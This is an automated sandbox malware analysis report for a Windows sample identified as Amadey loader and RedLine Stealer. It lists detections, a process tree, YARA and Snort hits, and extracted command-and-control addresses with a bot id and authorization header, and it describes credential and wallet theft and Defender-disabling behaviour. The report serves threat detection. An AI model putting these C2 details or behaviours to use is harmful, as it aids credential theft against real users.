Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:808971
MD5:33f01dc275ffa0c5989f8630eb4279b5
SHA1:65e07e1c5d25a9d9817664a11d603dd7a5e21a6f
SHA256:e8d4d6a87f54b65a7a04e7ccd0da266638f71e4c2b4d309eff8a5d79b48c058f
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4228 cmdline: C:\Users\user\Desktop\file.exe MD5: 33F01DC275FFA0C5989F8630EB4279B5)
    • gck46uD.exe (PID: 6024 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe MD5: 4C0E7D70D851B36C6338565474276043)
      • gDR79xP.exe (PID: 6020 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe MD5: 57EB0A896C2D871FDCCB5F4A5765F84D)
        • gOk22TE.exe (PID: 6108 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe MD5: 169FAA6C3CA7D213D20BDC00810116B8)
          • aWM14.exe (PID: 6100 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
          • bRz07Kk.exe (PID: 4812 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe MD5: DD0C9E110C68CE1FA5308979EF718F7B)
  • rundll32.exe (PID: 5148 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 2136 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3112 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 732 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "193.233.20.2/Bn89hku/index.php", "Version": "3.66"}

Threatname: RedLine

{"C2 url": "193.233.20.13:4136", "Bot Id": "dubka", "Authorization Header": "e5a9421183a033f283b2f23139b471f0"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1a438:$pat14: , CommandLine:
        • 0x134ab:$v2_1: ListOfProcesses
        • 0x1328a:$v4_3: base64str
        • 0x13e03:$v4_4: stringKey
        • 0x11b63:$v4_5: BytesToStringConverted
        • 0x10d76:$v4_6: FromBase64
        • 0x12098:$v4_8: procName
        • 0x1281d:$v5_5: FileScanning
        • 0x11d6c:$v5_7: RecordHeaderField
        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  Process Memory Space: bRz07Kk.exe PID: 4812JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 1 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    3.3.gOk22TE.exe.4c0bc20.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      3.3.gOk22TE.exe.4c0bc20.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1a438:$pat14: , CommandLine:
                      • 0x134ab:$v2_1: ListOfProcesses
                      • 0x1328a:$v4_3: base64str
                      • 0x13e03:$v4_4: stringKey
                      • 0x11b63:$v4_5: BytesToStringConverted
                      • 0x10d76:$v4_6: FromBase64
                      • 0x12098:$v4_8: procName
                      • 0x1281d:$v5_5: FileScanning
                      • 0x11d6c:$v5_7: RecordHeaderField
                      • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                      1.3.gck46uD.exe.497cc20.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        1.3.gck46uD.exe.497cc20.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          3.3.gOk22TE.exe.4c0bc20.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            Click to see the 3 entries

                            Sigma Signatures

                            No Sigma rule has matched

                            Snort Signatures

                            Timestamp:193.233.20.13192.168.2.34136497022043234 02/15/23-21:48:41.150000
                            SID:2043234
                            Source Port:4136
                            Destination Port:49702
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.3193.233.20.134970241362043233 02/15/23-21:48:39.233243
                            SID:2043233
                            Source Port:49702
                            Destination Port:4136
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.3193.233.20.134970241362043231 02/15/23-21:48:58.203132
                            SID:2043231
                            Source Port:49702
                            Destination Port:4136
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Multi AV Scanner detection for submitted file
                            Source: file.exeVirustotal: Detection: 56%Perma Link
                            Antivirus / Scanner detection for submitted sample
                            Source: file.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                            Machine Learning detection for sample
                            Source: file.exeJoe Sandbox ML: detected
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeJoe Sandbox ML: detected
                            Source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.13:4136", "Bot Id": "dubka", "Authorization Header": "e5a9421183a033f283b2f23139b471f0"}
                            Source: 1.3.gck46uD.exe.497cc20.0.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "193.233.20.2/Bn89hku/index.php", "Version": "3.66"}
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00052F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00052F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00022F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00022F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00102F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00102F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_010E2F1D
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: wextract.pdb source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gck46uD.exe, 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, dEX81lT.exe.1.dr
                            Source: Binary string: wextract.pdbGCTL source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: gOk22TE.exe, 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, aWM14.exe, 00000004.00000000.253025851.0000000000F22000.00000002.00000001.01000000.00000007.sdmp, aWM14.exe.3.dr
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00052390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00052390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exeCode function: 1_2_00022390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00022390
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exeCode function: 2_2_00102390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00102390
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exeCode function: 3_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_010E2390

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49702 -> 193.233.20.13:4136
                            Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49702 -> 193.233.20.13:4136
                            Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.13:4136 -> 192.168.2.3:49702
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 193.233.20.2/Bn89hku/index.php
                            Source: Malware configuration extractorURLs: 193.233.20.13:4136
                            Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                            Source: Joe Sandbox ViewIP Address: 193.233.20.13 193.233.20.13
                            Source: global trafficTCP traffic: 192.168.2.3:49702 -> 193.233.20.13:4136
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://ocsp.digicert.com0H
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://ocsp.digicert.com0I
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
